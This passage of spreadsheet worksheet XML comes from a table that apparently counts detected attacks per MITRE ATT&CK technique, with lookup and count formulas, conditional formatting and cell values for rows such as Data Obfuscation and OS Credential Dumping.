    <cfRule type="expression" dxfId="173" priority="36">
      <formula>IF(OR(J32&lt;H32,J32&lt;I32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J41:J45">
    <cfRule type="expression" dxfId="172" priority="30">
      <formula>IF(OR(J41&lt;H41,J41&lt;I41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J50 J53:J54">
    <cfRule type="expression" dxfId="171" priority="24">
      <formula>IF(OR(J50&lt;H50,J50&lt;I50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K21:N21">
    <cfRule type="expression" dxfId="170" priority="145">
      <formula>IF(K21&lt;K12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K23:N23">
    <cfRule type="expression" dxfId="169" priority="343">
      <formula>IF(K23&gt;K14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K28:N28">
    <cfRule type="expression" dxfId="168" priority="146">
      <formula>IF(K28&lt;K19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K43:N43">
    <cfRule type="expression" dxfId="167" priority="213">
      <formula>IF(OR(K43&lt;K44,K43&lt;K45),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="K55:N55">
    <cfRule type="expression" dxfId="166" priority="148">
      <formula>IF(K55&lt;K46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L6:L9">
    <cfRule type="expression" dxfId="165" priority="500">
      <formula>IF(L6&lt;K6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L14">
    <cfRule type="expression" dxfId="164" priority="396">
      <formula>IF(L14&lt;K14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L23">
    <cfRule type="expression" dxfId="163" priority="291">
      <formula>IF(L23&lt;K23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L41 L43:L45">
    <cfRule type="expression" dxfId="162" priority="206">
      <formula>IF(L41&lt;K41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L50 L54">
    <cfRule type="expression" dxfId="161" priority="151">
      <formula>IF(L50&lt;K50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N6:N9">
    <cfRule type="expression" dxfId="160" priority="496">
      <formula>IF(N6&lt;M6,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N14">
    <cfRule type="expression" dxfId="159" priority="388">
      <formula>IF(N14&lt;M14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N23">
    <cfRule type="expression" dxfId="158" priority="278">
      <formula>IF(N23&lt;M23,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N41 N43:N45">
    <cfRule type="expression" dxfId="157" priority="205">
      <formula>IF(N41&lt;M41,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N50 N54">
    <cfRule type="expression" dxfId="156" priority="150">
      <formula>IF(N50&lt;M50,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" scale="5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tabColor rgb="FFD2002D"/>
    <outlinePr summaryBelow="0" summaryRight="0"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:CT1086"/>
  <sheetViews>
    <sheetView zoomScale="115" zoomScaleNormal="115" workbookViewId="0">
      <pane xSplit="2" ySplit="2" topLeftCell="F49" activePane="bottomRight" state="frozen"/>
      <selection activeCell="Q6" sqref="Q6"/>
      <selection pane="topRight" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomLeft" activeCell="Q6" sqref="Q6"/>
      <selection pane="bottomRight" activeCell="CG80" sqref="CG80"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="12.5703125" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="4" style="4" customWidth="1"/>
    <col min="2" max="2" width="9.7109375" style="4" customWidth="1"/>
    <col min="3" max="3" width="21.140625" style="4" customWidth="1"/>
    <col min="4" max="4" width="9" style="6" hidden="1" customWidth="1"/>
    <col min="5" max="5" width="10.7109375" style="6" hidden="1" customWidth="1"/>
    <col min="6" max="6" width="13.5703125" style="4" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="8" max="8" width="9.7109375" style="4" hidden="1" customWidth="1"/>
    <col min="9" max="9" width="13.7109375" style="4" hidden="1" customWidth="1"/>
    <col min="10" max="10" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="11" max="11" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="12" max="12" width="8" style="4" hidden="1" customWidth="1"/>
    <col min="13" max="14" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="15" max="15" width="11.85546875" style="4" hidden="1" customWidth="1"/>
    <col min="16" max="16" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="17" max="17" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="18" max="18" width="9.7109375" style="4" hidden="1" customWidth="1"/>
    <col min="19" max="20" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="21" max="21" width="14.85546875" style="4" hidden="1" customWidth="1"/>
    <col min="22" max="22" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="23" max="24" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="25" max="26" width="10.42578125" style="4" hidden="1" customWidth="1"/>
    <col min="27" max="27" width="15.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="28" max="28" width="5.42578125" style="4" hidden="1" customWidth="1"/>
    <col min="29" max="29" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="30" max="30" width="8.28515625" style="3" hidden="1" customWidth="1"/>
    <col min="31" max="32" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="33" max="33" width="16.42578125" style="4" hidden="1" customWidth="1"/>
    <col min="34" max="34" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="35" max="35" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="36" max="36" width="9.7109375" style="4" hidden="1" customWidth="1"/>
    <col min="37" max="38" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="39" max="39" width="15.85546875" style="4" hidden="1" customWidth="1"/>
    <col min="40" max="40" width="6.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="41" max="41" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="42" max="42" width="9.28515625" style="4" hidden="1" customWidth="1"/>
    <col min="43" max="43" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="44" max="44" width="9.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="45" max="45" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="46" max="46" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="47" max="47" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="48" max="48" width="5.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="49" max="49" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="50" max="50" width="10.42578125" style="4" hidden="1" customWidth="1"/>
    <col min="51" max="51" width="11.28515625" style="4" hidden="1" customWidth="1"/>
    <col min="52" max="52" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="53" max="53" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="54" max="54" width="5.5703125" style="3" hidden="1" customWidth="1"/>
    <col min="55" max="55" width="7.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="56" max="56" width="10" style="4" hidden="1" customWidth="1"/>
    <col min="57" max="57" width="12.7109375" style="4" hidden="1" customWidth="1"/>
    <col min="58" max="58" width="4.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="59" max="59" width="8.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="60" max="60" width="5.5703125" style="4" hidden="1" customWidth="1"/>
    <col min="61" max="61" width="7.5703125" style="1" customWidth="1"/>
    <col min="62" max="62" width="10" style="1" customWidth="1"/>
    <col min="63" max="63" width="12.28515625" style="1" customWidth="1"/>
    <col min="64" max="64" width="5.5703125" style="1" customWidth="1"/>
    <col min="65" max="65" width="8.5703125" style="1" customWidth="1"/>
    <col min="66" max="68" width="7.5703125" style="1" customWidth="1"/>
    <col min="69" max="69" width="12.42578125" style="1" customWidth="1"/>
    <col min="70" max="71" width="5.5703125" style="1" customWidth="1"/>
    <col min="72" max="72" width="7.85546875" style="1" customWidth="1"/>
    <col min="73" max="73" width="8.5703125" style="1" customWidth="1"/>
    <col min="74" max="74" width="7.5703125" style="1" customWidth="1"/>
    <col min="75" max="75" width="10.85546875" style="1" customWidth="1"/>
    <col min="76" max="76" width="10.7109375" style="1" customWidth="1"/>
    <col min="77" max="77" width="6.7109375" style="5" customWidth="1"/>
    <col min="78" max="78" width="8.5703125" style="5" customWidth="1"/>
    <col min="79" max="81" width="7.5703125" style="1" customWidth="1"/>
    <col min="82" max="82" width="17.42578125" style="1" customWidth="1"/>
    <col min="83" max="84" width="5.5703125" style="5" customWidth="1"/>
    <col min="85" max="86" width="8.5703125" style="5" customWidth="1"/>
    <col min="87" max="89" width="10.7109375" style="1" customWidth="1"/>
    <col min="90" max="90" width="14.42578125" style="1" customWidth="1"/>
    <col min="91" max="91" width="32.85546875" style="5" hidden="1" customWidth="1"/>
    <col min="92" max="93" width="42.42578125" style="5" hidden="1" customWidth="1"/>
    <col min="94" max="228" width="29.140625" style="1" customWidth="1"/>
    <col min="229" max="16384" width="12.5703125" style="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:93" ht="25.5" customHeight="1">
      <c r="A1" s="663" t="s">
        <v>177</v>
      </c>
      <c r="B1" s="663" t="s">
        <v>285</v>
      </c>
      <c r="C1" s="663" t="s">
        <v>294</v>
      </c>
      <c r="D1" s="663" t="s">
        <v>290</v>
      </c>
      <c r="E1" s="663" t="s">
        <v>291</v>
      </c>
      <c r="F1" s="668" t="s">
        <v>288</v>
      </c>
      <c r="G1" s="665"/>
      <c r="H1" s="666"/>
      <c r="I1" s="666"/>
      <c r="J1" s="666"/>
      <c r="K1" s="666"/>
      <c r="L1" s="667"/>
      <c r="M1" s="665"/>
      <c r="N1" s="666"/>
      <c r="O1" s="666"/>
      <c r="P1" s="666"/>
      <c r="Q1" s="666"/>
      <c r="R1" s="667"/>
      <c r="S1" s="665"/>
      <c r="T1" s="666"/>
      <c r="U1" s="666"/>
      <c r="V1" s="666"/>
      <c r="W1" s="666"/>
      <c r="X1" s="667"/>
      <c r="Y1" s="665"/>
      <c r="Z1" s="666"/>
      <c r="AA1" s="666"/>
      <c r="AB1" s="666"/>
      <c r="AC1" s="666"/>
      <c r="AD1" s="667"/>
      <c r="AE1" s="665"/>
      <c r="AF1" s="666"/>
      <c r="AG1" s="666"/>
      <c r="AH1" s="666"/>
      <c r="AI1" s="666"/>
      <c r="AJ1" s="667"/>
      <c r="AK1" s="665"/>
      <c r="AL1" s="666"/>
      <c r="AM1" s="666"/>
      <c r="AN1" s="666"/>
      <c r="AO1" s="666"/>
      <c r="AP1" s="667"/>
      <c r="AQ1" s="676"/>
      <c r="AR1" s="677"/>
      <c r="AS1" s="677"/>
      <c r="AT1" s="666"/>
      <c r="AU1" s="666"/>
      <c r="AV1" s="667"/>
      <c r="AW1" s="665"/>
      <c r="AX1" s="666"/>
      <c r="AY1" s="666"/>
      <c r="AZ1" s="666"/>
      <c r="BA1" s="666"/>
      <c r="BB1" s="667"/>
      <c r="BC1" s="665"/>
      <c r="BD1" s="666"/>
      <c r="BE1" s="666"/>
      <c r="BF1" s="666"/>
      <c r="BG1" s="666"/>
      <c r="BH1" s="667"/>
      <c r="BI1" s="674" t="s">
        <v>2452</v>
      </c>
      <c r="BJ1" s="675"/>
      <c r="BK1" s="675"/>
      <c r="BL1" s="675"/>
      <c r="BM1" s="675"/>
      <c r="BN1" s="675"/>
      <c r="BO1" s="674" t="s">
        <v>2449</v>
      </c>
      <c r="BP1" s="675"/>
      <c r="BQ1" s="675"/>
      <c r="BR1" s="675"/>
      <c r="BS1" s="675"/>
      <c r="BT1" s="675"/>
      <c r="BU1" s="675"/>
      <c r="BV1" s="671" t="s">
        <v>2450</v>
      </c>
      <c r="BW1" s="672"/>
      <c r="BX1" s="672"/>
      <c r="BY1" s="672"/>
      <c r="BZ1" s="672"/>
      <c r="CA1" s="672"/>
      <c r="CB1" s="671" t="s">
        <v>2451</v>
      </c>
      <c r="CC1" s="672"/>
      <c r="CD1" s="672"/>
      <c r="CE1" s="672"/>
      <c r="CF1" s="672"/>
      <c r="CG1" s="672"/>
      <c r="CH1" s="673"/>
    </row>
    <row r="2" spans="1:93" s="3" customFormat="1" ht="52.5" customHeight="1">
      <c r="A2" s="664"/>
      <c r="B2" s="664"/>
      <c r="C2" s="664"/>
      <c r="D2" s="664"/>
      <c r="E2" s="664"/>
      <c r="F2" s="669"/>
      <c r="G2" s="288"/>
      <c r="H2" s="392"/>
      <c r="I2" s="392"/>
      <c r="J2" s="4"/>
      <c r="K2" s="4"/>
      <c r="L2" s="585"/>
      <c r="M2" s="291"/>
      <c r="N2" s="291"/>
      <c r="O2" s="392"/>
      <c r="P2" s="582"/>
      <c r="Q2" s="4"/>
      <c r="R2" s="583"/>
      <c r="S2" s="396"/>
      <c r="T2" s="291"/>
      <c r="U2" s="392"/>
      <c r="V2" s="582"/>
      <c r="W2" s="4"/>
      <c r="X2" s="585"/>
      <c r="Y2" s="392"/>
      <c r="Z2" s="392"/>
      <c r="AA2" s="392"/>
      <c r="AB2" s="4"/>
      <c r="AC2" s="4"/>
      <c r="AD2" s="583"/>
      <c r="AE2" s="288"/>
      <c r="AF2" s="392"/>
      <c r="AG2" s="392"/>
      <c r="AH2" s="4"/>
      <c r="AI2" s="4"/>
      <c r="AJ2" s="585"/>
      <c r="AK2" s="291"/>
      <c r="AL2" s="291"/>
      <c r="AM2" s="392"/>
      <c r="AN2" s="582"/>
      <c r="AO2" s="4"/>
      <c r="AP2" s="583"/>
      <c r="AQ2" s="396"/>
      <c r="AR2" s="291"/>
      <c r="AS2" s="392"/>
      <c r="AT2" s="582"/>
      <c r="AU2" s="4"/>
      <c r="AV2" s="585"/>
      <c r="AW2" s="392"/>
      <c r="AX2" s="392"/>
      <c r="AY2" s="392"/>
      <c r="AZ2" s="4"/>
      <c r="BA2" s="4"/>
      <c r="BB2" s="583"/>
      <c r="BC2" s="511"/>
      <c r="BD2" s="512"/>
      <c r="BE2" s="392"/>
      <c r="BF2" s="584"/>
      <c r="BG2" s="493"/>
      <c r="BH2" s="513"/>
      <c r="BI2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BJ2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BK2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BL2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BM2" s="325" t="s">
        <v>2488</v>
      </c>
      <c r="BN2" s="336" t="s">
        <v>4132</v>
      </c>
      <c r="BO2" s="339" t="s">
        <v>293</v>
      </c>
      <c r="BP2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BQ2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BR2" s="324" t="s">
        <v>2252</v>
      </c>
      <c r="BS2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="BT2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="BU2" s="397" t="s">
        <v>4131</v>
      </c>
      <c r="BV2" s="338" t="s">
        <v>293</v>
      </c>
      <c r="BW2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="BX2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="BY2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="BZ2" s="324" t="s">
        <v>2489</v>
      </c>
      <c r="CA2" s="336" t="s">
        <v>4133</v>
      </c>
      <c r="CB2" s="404" t="s">
        <v>293</v>
      </c>
      <c r="CC2" s="338" t="s">
        <v>4457</v>
      </c>
      <c r="CD2" s="392" t="s">
        <v>4471</v>
      </c>
      <c r="CE2" s="324" t="s">
        <v>2253</v>
      </c>
      <c r="CF2" s="337" t="s">
        <v>730</v>
      </c>
      <c r="CG2" s="325" t="s">
        <v>2487</v>
      </c>
      <c r="CH2" s="397" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="3" spans="1:93" s="8" customFormat="1" ht="15" customHeight="1">
      <c r="A3" s="4">
        <v>1</v>
      </c>
      <c r="B3" s="4" t="str">
        <f>IFERROR(VLOOKUP(A3,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1001</v>
      </c>
      <c r="C3" s="493" t="str">
        <f>IFERROR(VLOOKUP(B3,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Data Obfuscation</v>
      </c>
      <c r="D3" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B3)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E3" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B3,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F3" s="286" t="str">
        <f>D3&amp;" ("&amp;E3&amp;")"</f>
        <v>2 (2)</v>
      </c>
      <c r="G3" s="292"/>
      <c r="H3" s="322"/>
      <c r="I3" s="322"/>
      <c r="J3" s="12"/>
      <c r="K3" s="13"/>
      <c r="L3" s="394"/>
      <c r="M3" s="322"/>
      <c r="N3" s="322"/>
      <c r="O3" s="322"/>
      <c r="P3" s="12"/>
      <c r="Q3" s="13"/>
      <c r="R3" s="394"/>
      <c r="S3" s="292"/>
      <c r="T3" s="322"/>
      <c r="U3" s="322"/>
      <c r="V3" s="12"/>
      <c r="W3" s="13"/>
      <c r="X3" s="394"/>
      <c r="Y3" s="392"/>
      <c r="Z3" s="392"/>
      <c r="AA3" s="322"/>
      <c r="AB3" s="392"/>
      <c r="AC3" s="16"/>
      <c r="AD3" s="394"/>
      <c r="AE3" s="392"/>
      <c r="AF3" s="392"/>
      <c r="AG3" s="322"/>
      <c r="AH3" s="392"/>
      <c r="AI3" s="16"/>
      <c r="AJ3" s="394"/>
      <c r="AK3" s="392"/>
      <c r="AL3" s="392"/>
      <c r="AM3" s="322"/>
      <c r="AN3" s="392"/>
      <c r="AO3" s="16"/>
      <c r="AP3" s="394"/>
      <c r="AQ3" s="292"/>
      <c r="AR3" s="322"/>
      <c r="AS3" s="322"/>
      <c r="AT3" s="12"/>
      <c r="AU3" s="13"/>
      <c r="AV3" s="394"/>
      <c r="AW3" s="392"/>
      <c r="AX3" s="392"/>
      <c r="AY3" s="322"/>
      <c r="AZ3" s="4"/>
      <c r="BA3" s="16"/>
      <c r="BB3" s="394"/>
      <c r="BC3" s="292"/>
      <c r="BD3" s="322"/>
      <c r="BE3" s="322"/>
      <c r="BF3" s="12"/>
      <c r="BG3" s="13"/>
      <c r="BH3" s="394"/>
      <c r="BI3" s="292">
        <v>0</v>
      </c>
      <c r="BJ3" s="322">
        <v>0</v>
      </c>
      <c r="BK3" s="322" t="str">
        <f>BJ3 &amp; " (" &amp; BI3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL3" s="12">
        <v>0</v>
      </c>
      <c r="BM3" s="13">
        <v>0</v>
      </c>
      <c r="BN3" s="394">
        <v>0</v>
      </c>
      <c r="BO3" s="292">
        <v>2</v>
      </c>
      <c r="BP3" s="322">
        <v>2</v>
      </c>
      <c r="BQ3" s="322" t="str">
        <f>BP3 &amp; " (" &amp; BO3 &amp; ")"</f>
        <v>2 (2)</v>
      </c>
      <c r="BR3" s="12">
        <v>0</v>
      </c>
      <c r="BS3" s="12">
        <v>2</v>
      </c>
      <c r="BT3" s="13">
        <v>1</v>
      </c>
      <c r="BU3" s="394">
        <v>2</v>
      </c>
      <c r="BV3" s="292">
        <v>0</v>
      </c>
      <c r="BW3" s="322">
        <v>0</v>
      </c>
      <c r="BX3" s="322" t="str">
        <f>BW3 &amp; " (" &amp; BV3 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY3" s="12">
        <v>0</v>
      </c>
      <c r="BZ3" s="13">
        <v>0</v>
      </c>
      <c r="CA3" s="394">
        <v>0</v>
      </c>
      <c r="CB3" s="292">
        <v>0</v>
      </c>
      <c r="CC3" s="322">
        <v>0</v>
      </c>
      <c r="CD3" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE3" s="12">
        <v>0</v>
      </c>
      <c r="CF3" s="12">
        <v>0</v>
      </c>
      <c r="CG3" s="13">
        <v>0</v>
      </c>
      <c r="CH3" s="394">
        <v>0</v>
      </c>
      <c r="CM3" s="9"/>
      <c r="CN3" s="9"/>
      <c r="CO3" s="9"/>
    </row>
    <row r="4" spans="1:93" ht="15" customHeight="1">
      <c r="A4" s="4">
        <f>A3+1</f>
        <v>2</v>
      </c>
      <c r="B4" s="4" t="str">
        <f>IFERROR(VLOOKUP(A4,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1003</v>
      </c>
      <c r="C4" s="493" t="str">
        <f>IFERROR(VLOOKUP(B4,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>OS Credential Dumping</v>
      </c>
      <c r="D4" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B4)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E4" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B4,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F4" s="579" t="str">
        <f>D4&amp;" ("&amp;E4&amp;")"</f>
        <v>1 (3)</v>
      </c>
      <c r="G4" s="292"/>
      <c r="H4" s="322"/>
      <c r="I4" s="322"/>
      <c r="J4" s="12"/>
      <c r="K4" s="13"/>
      <c r="L4" s="394"/>
      <c r="M4" s="322"/>
      <c r="N4" s="322"/>
      <c r="O4" s="322"/>
      <c r="P4" s="12"/>
      <c r="Q4" s="13"/>
      <c r="R4" s="394"/>
      <c r="S4" s="292"/>
      <c r="T4" s="322"/>
      <c r="U4" s="322"/>
      <c r="V4" s="12"/>
      <c r="W4" s="13"/>
      <c r="X4" s="394"/>
      <c r="Y4" s="392"/>
      <c r="Z4" s="392"/>
      <c r="AA4" s="322"/>
      <c r="AB4" s="392"/>
      <c r="AC4" s="16"/>
      <c r="AD4" s="394"/>
      <c r="AE4" s="392"/>
      <c r="AF4" s="392"/>
      <c r="AG4" s="322"/>
      <c r="AH4" s="392"/>
      <c r="AI4" s="16"/>
      <c r="AJ4" s="394"/>
      <c r="AK4" s="392"/>
      <c r="AL4" s="392"/>
      <c r="AM4" s="322"/>
      <c r="AN4" s="392"/>
      <c r="AO4" s="16"/>
      <c r="AP4" s="394"/>
      <c r="AQ4" s="292"/>
      <c r="AR4" s="322"/>
      <c r="AS4" s="322"/>
      <c r="AT4" s="12"/>
      <c r="AU4" s="13"/>
      <c r="AV4" s="394"/>
      <c r="AW4" s="392"/>
      <c r="AX4" s="392"/>
      <c r="AY4" s="322"/>
      <c r="BA4" s="16"/>
      <c r="BB4" s="394"/>
      <c r="BC4" s="292"/>
      <c r="BD4" s="322"/>
      <c r="BE4" s="322"/>
      <c r="BF4" s="12"/>
      <c r="BG4" s="13"/>
      <c r="BH4" s="394"/>
      <c r="BI4" s="292">
        <v>0</v>
      </c>
      <c r="BJ4" s="322">
        <v>0</v>
      </c>
      <c r="BK4" s="322" t="str">
        <f t="shared" ref="BK4:BK67" si="0">BJ4 &amp; " (" &amp; BI4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BL4" s="12">
        <v>0</v>
      </c>
      <c r="BM4" s="13">
        <v>0</v>
      </c>
      <c r="BN4" s="394">
        <v>0</v>
      </c>
      <c r="BO4" s="292">
        <v>2</v>
      </c>
      <c r="BP4" s="322">
        <v>2</v>
      </c>
      <c r="BQ4" s="322" t="str">
        <f t="shared" ref="BQ4:BQ67" si="1">BP4 &amp; " (" &amp; BO4 &amp; ")"</f>
        <v>2 (2)</v>
      </c>
      <c r="BR4" s="12">
        <v>0</v>
      </c>
      <c r="BS4" s="12">
        <v>2</v>
      </c>
      <c r="BT4" s="13">
        <v>1</v>
      </c>
      <c r="BU4" s="394">
        <v>2</v>
      </c>
      <c r="BV4" s="292">
        <v>0</v>
      </c>
      <c r="BW4" s="322">
        <v>0</v>
      </c>
      <c r="BX4" s="322" t="str">
        <f t="shared" ref="BX4:BX67" si="2">BW4 &amp; " (" &amp; BV4 &amp; ")"</f>
        <v>0 (0)</v>
      </c>
      <c r="BY4" s="12">
        <v>0</v>
      </c>
      <c r="BZ4" s="13">
        <v>0</v>
      </c>
      <c r="CA4" s="394">
        <v>0</v>
      </c>
      <c r="CB4" s="292">
        <v>0</v>
      </c>
      <c r="CC4" s="322">
        <v>0</v>
      </c>
      <c r="CD4" s="322" t="s">
        <v>4741</v>
      </c>
      <c r="CE4" s="12">
        <v>0</v>
      </c>
      <c r="CF4" s="12">
        <v>0</v>
      </c>
      <c r="CG4" s="13">
        <v>0</v>
      </c>
      <c r="CH4" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="1:93" ht="15" customHeight="1">
      <c r="A5" s="4">
        <f t="shared" ref="A5:A68" si="3">A4+1</f>
        <v>3</v>
      </c>
      <c r="B5" s="4" t="str">
        <f>IFERROR(VLOOKUP(A5,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1008</v>
      </c>
      <c r="C5" s="493" t="str">
        <f>IFERROR(VLOOKUP(B5,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Fallback Channels</v>
      </c>
      <c r="D5" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B5)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E5" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B5,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>6</v>
      </c>
      <c r="F5" s="579" t="str">
        <f t="shared" ref="F5:F68" si="4">D5&amp;" ("&amp;E5&amp;")"</f>
        <v>1 (6)</v>
      </c>
      <c r="G5" s="292"/>
      <c r="H5" s="322"/>
      <c r="I5" s="322"/>
      <c r="J5" s="12"/>
      <c r="K5" s="13"/>
      <c r="L5" s="394"/>
      <c r="M5" s="322"/>
      <c r="N5" s="322"/>
      <c r="O5" s="322"/>
      <c r="P5" s="12"/>
      <c r="Q5" s="13"/>
      <c r="R5" s="394"/>
      <c r="S5" s="292"/>
      <c r="T5" s="322"/>
      <c r="U5" s="322"/>
      <c r="V5" s="12"/>
      <c r="W5" s="13"/>
      <c r="X5" s="394"/>
      <c r="Y5" s="392"/>
      <c r="Z5" s="392"/>
      <c r="AA5" s="322"/>
      <c r="AB5" s="392"/>
      <c r="AC5" s="16"/>
      <c r="AD5" s="394"/>
      <c r="AE5" s="392"/>
      <c r="AF5" s="392"/>
      <c r="AG5" s="322"/>
      <c r="AH5" s="392"/>
      <c r="AI5" s="16"/>
      <c r="AJ5" s="394"/>
      <c r="AK5" s="392"/>
      <c r="AL5" s="392"/>
      <c r="AM5" s="322"/>
      <c r="AN5" s="392"/>
      <c r="AO5" s="16"/>
      <c r="AP5" s="394"/>
      <c r="AQ5" s="292"/>
      <c r="AR5" s="322"/>
      <c r="AS5" s="322"/>
      <c r="AT5" s="12"/>
      <c r="AU5" s="13"/>
      <c r="AV5" s="394"/>
      <c r="AW5" s="392"/>
      <c r="AX5" s="392"/>
      <c r="AY5" s="322"/>
      <c r="BA5" s="16"/>
      <c r="BB5" s="394"/>
      <c r="BC5" s="292"/>
      <c r="BD5" s="322"/>
      <c r="BE5" s="322"/>
      <c r="BF5" s="12"/>
      <c r="BG5" s="13"/>
      <c r="BH5" s="394"/>
      <c r="BI5" s="292">
        <v>0</v>
      </c>
      <c r="BJ5" s="322">
        <v>0</v>
      </c>
      <c r="BK5" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="BL5" s="12">
        <v>0</v>
      </c>
      <c r="BM5" s="13">
        <v>0</v>
      </c>
      <c r="BN5" s="394">
        <v>0</v>
      </c>
      <c r="BO5" s="292">
        <v>7</v>
      </c>
      <c r="BP5" s="322">
        <v>7</v>
      </c>
      <c r="BQ5" s="322" t="str">
        <f t="shared" si="1"/>
        <v>7 (7)</v>
      </c>
      <c r="BR5" s="12">
        <v>0</v>
      </c>
      <c r="BS5" s="12">
        <v>5</v>
      </c>
      <c r="BT5" s="13">
        <v>1</v>
      </c>
      <c r="BU5" s="394">
        <v>5</v>
      </c>
      <c r="BV5" s="292">
        <v>2</v>
      </c>
      <c r="BW5" s="322">
        <v>2</v>
      </c>
      <c r="BX5" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (2)</v>
